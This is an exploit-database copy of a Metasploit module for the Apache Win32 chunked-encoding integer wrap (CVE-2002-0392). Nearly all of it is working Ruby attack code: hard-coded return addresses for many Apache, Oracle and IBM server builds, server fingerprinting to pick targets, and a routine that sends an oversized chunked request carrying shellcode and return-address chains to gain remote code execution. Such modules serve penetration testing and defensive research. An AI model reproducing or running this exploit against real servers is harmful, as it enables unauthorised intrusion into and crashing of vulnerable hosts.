Apache (Windows x86) – Chunked Encoding (Metasploit)

  • 作者: Metasploit
    日期: 2010-07-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/16782/
  • ##
    # $Id: apache_chunked.rb 9719 2010-07-07 17:38:59Z jduck $
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = GoodRanking
    
    	HttpFingerprint = { :pattern => [ /Apache/ ] }
    
    	include Msf::Exploit::Remote::HttpClient
    
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'Apache Win32 Chunked Encoding',
    			'Description'=> %q{
    					This module exploits the chunked transfer integer wrap
    				vulnerability in Apache version 1.2.x to 1.3.24. This
    				particular module has been tested with all versions of the
    				official Win32 build between 1.3.9 and 1.3.24. Additionally,
    				it should work against most co-branded and bundled versions
    				of Apache (Oracle 8i, 9i, IBM HTTPD, etc).
    
    				You will need to use the Check() functionality to determine
    				the exact target version prior to launching the exploit. The
    				version of Apache bundled with Oracle 8.1.7 will not
    				automatically restart, so if you use the wrong target value,
    				the server will crash.
    			},
    			'Author' => [ 'hdm', 'jduck' ],
    			'Version'=> '$Revision: 9719 $',
    			'References' =>
    				[
    					[ 'CVE', '2002-0392' ],
    					[ 'OSVDB', '838'],
    					[ 'BID', '5033' ],
    					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html'],
    
    				],
    			'Privileged' => true,
    			'Platform' => 'win',
    			'Payload'=>
    				{
    					'Space'=> 987,
    					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
    					'MinNops'=> 200,
    					'Prepend'=> "\x81\xc4\xff\xef\xff\xff\x44",
    
    				},
    			'Targets'=>
    				[
    					['Windows Generic Bruteforce', {} ],
    
    					# Official Apache.org win32 builds
    					['Apache.org Build 1.3.9->1.3.19',
    						{
    							'Ret' => 0x00401151,
    							'Pad' => [6,2,0,4,1,3,5,7]
    						}
    					],
    					['Apache.org Build 1.3.22->1.3.24',
    						{
    							'Ret' => 0x00401141,
    							'Pad' => [2,6,0,4,1,3,5,7]
    						}
    					],
    					['Apache.org Build 1.3.19->1.3.24',
    						{
    							'Ret' => 0x6ff6548d,
    							'Pad' => [2,6,0,4,1,3,5,7]
    						}
    					],
    					['Apache.org Build 1.3.22',
    						{
    							'Ret' => 0x6ff762ac,
    							'Pad' => [2,6,0,4,1,3,5,7]
    						}
    					],
    
    					# Return to Win9xConHook.dll via call ebx
    					['Apache.org Build 1.3.17->1.3.24 (Windows 2000)',
    						{
    							'Ret' => 0x1c0f13e5,
    							'Pad' => [2,6,0,4,1,3,5,7]
    						}
    					],
    
    					# Return to Win9xConHook.dll via call esi
    					['Apache.org Build 1.3.17->1.3.24 (Windows NT)',
    						{
    							'Ret' => 0x1c0f1033,
    							'Pad' => [2,6,0,4,1,3,5,7]
    						}
    					],
    
    					# Interesting return to PEB trick for Windows 2003 systems...
    					['Windows 2003 English SP0',
    						{
    							'Ret' => 0x7ffc0638,
    							'Pad' => [2,6,5,4,1,3,0,7]
    						}
    					],
    
    					# Pop/Pop/Return on Windows 2000
    					['Windows 2000 English',
    						{
    							'Ret' => 0x75022ac4,
    							'Pad' => [2,6,5,4,1,3,0,7]
    						}
    					],
    
    					# Oracle HTTPD: [ 8.1.7 ] (one shot)
    					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
    					# OpenSSL/0.9.5a mod_perl/1.24
    					['Oracle 8.1.7 Apache 1.3.12',
    						{
    							'Ret' => 0x1d84d42c,
    							'Pad' => [7]
    						}
    					],
    
    					# Oracle HTTPD: [ 9.1.0 ] (multiple shots)
    					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
    					# OpenSSL/0.9.5a mod_perl/1.24
    					['Oracle 9.1.0 Apache 1.3.12',
    						{
    							'Ret' => 0x10016061,
    							'Pad' => [5,6,0,4,1,3,2,7]
    						}
    					],
    
    					# Oracle HTTPD: [ 9.2.0 ] (multiple shots)
    					# Oracle HTTP Server Powered by Apache/1.3.22 (Win32)
    					# mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b
    					# mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25
    					['Oracle 9.2.0 Apache 1.3.22',
    						{
    							'Ret' => 0x6ff6427a,
    							'Pad' => [5,6,0,4,1,3,2,7]
    						}
    					],
    
    					# Generic debugging targets
    					['Debugging Target',
    						{
    							'Ret' => 0xcafebabe,
    							'Pad' => [0,1,2,3,4,5,6,7]
    						}
    					]
    				],
    			'DisclosureDate' => 'Jun 19 2002',
    			'DefaultTarget'=> 0))
    	end
    
    	def check
    		response = send_request_raw({'uri' => '/'}, 5)
    		if response.nil?
    			print_status("No response to request")
    			return Exploit::CheckCode::Safe
    		end
    
    		http_fingerprint({ :response => response })# Custom Server header matching
    
    		code = Exploit::CheckCode::Appears
    
    		case response['Server']
    			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
    				print_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)")
    			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
    				print_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)")
    			when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
    				print_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)")
    			when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
    				print_status("IBM backported the patch, this system is not vulnerable")
    				code = Exploit::CheckCode::Safe
    			when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/
    			else
    				code = Exploit::CheckCode::Safe
    		end
    
    		if code == Exploit::CheckCode::Appears
    			print_status("Vulnerable server: #{response['Server']}")
    		else
    			print_status("Server is probably not vulnerable: #{response['Server']}")
    		end
    
    		return code
    	end
    
    	def auto_target
    		response = send_request_raw({'uri' => '/'}, 5)
    		if response.nil?
    			print_error("No response to request")
    			return targets_to_try
    		end
    
    		http_fingerprint({ :response => response })# Custom Server header matching / automatic target selection
    
    		targets_to_try = []
    		server_hdr = response['Server']
    		print_status("Server: #{server_hdr}")
    
    		case server_hdr
    		when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
    			targets_to_try.push(targets[9])
    
    		when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
    			targets_to_try.push(targets[10])
    
    		when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
    			targets_to_try.push(targets[11])
    
    		when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
    			# fall through
    
    		else
    			# check for apache version ranges
    			if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)
    				version = $1
    
    				#print_status("Apache version: #{version}")
    				ver = version.split('.')
    				if (ver.length == 3)
    					major = ver[0].to_i
    					minor = ver[1].to_i
    					rev = ver[2].to_i
    					if (major == 1 and minor == 3)
    						targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)
    						targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)
    						targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)
    						targets_to_try.push(targets[4]) if (rev == 22)
    
    						# Add the remaining targets, regardless of quality...
    						if (server_hdr =~ /Win32/)
    							# targets 4, 5, 6, 7
    							if (rev >= 17 and rev <= 24)
    								targets_to_try.push(targets[5])
    								targets_to_try.push(targets[6])
    							end
    							targets_to_try.push(targets[7])
    							targets_to_try.push(targets[8])
    						end
    					end
    					# Version 1.0 - 1.2, Fall through...
    				end
    				# ServerTokens setting isn't giving up enough information ...Might need to try?
    			end
    			# Not Apache?Fall through...
    		end
    
    		targets_to_try
    	end
    
    	#
    	# If auto, ask the auto_target function for a list of
    	# targets to try...
    	#
    	# If not auto, just try the selected target.
    	#
    	def exploit
    		if target_index == 0
    			targs = auto_target
    			print_status("Auto-targeting returned #{targs.length} candidates...")
    			targs.each_with_index { |targ, idx|
    				# Never try the debug target automatically :)
    				next if targ.name =~ /Debug/
    				exploit_target(targ)
    			}
    		else
    			exploit_target(target)
    		end
    	end
    
    	def exploit_target(target)
    		target['Pad'].each { |pad|
    			pattern =
    				rand_text_alphanumeric(3936) +
    				payload.encoded +
    				make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +
    				rand_text_alphanumeric(pad)
    
    			# Move slightly further back to allow padding changes
    			pattern +=
    				"\xeb\xf0\xde\xad" +
    				[target.ret].pack('V')
    
    			# Create a chain of return addresses and reverse jumps
    			254.times { |x|
    				pattern +=
    					"\xeb\xf6\xbe\xef" +
    					[target.ret].pack('V')
    			}
    
    			# Even out the request length based on the padding value
    			# This is required to reliably hit the return address offset
    			pattern += rand_text_alphanumeric(8 - pad)
    
    			#
    			# Regardless of what return we hit, execution jumps backwards to the shellcode:
    			# _______________ _______________ ___________
    			# ______________________| ________| | ______| | ______
    			# v |v |v v|| v v|| v v|
    			# [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]
    			#
    
    			print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")
    
    			# Build the request
    			send_request_raw({
    				'uri' => '/',
    				'headers' =>
    					{
    						'Transfer-Encoding' => "CHUNKED"
    					},
    				'data'=> "FFFFFFF0 " + pattern,
    			}, 2)
    
    			# Check the handler
    			handler
    		}
    	end
    
    end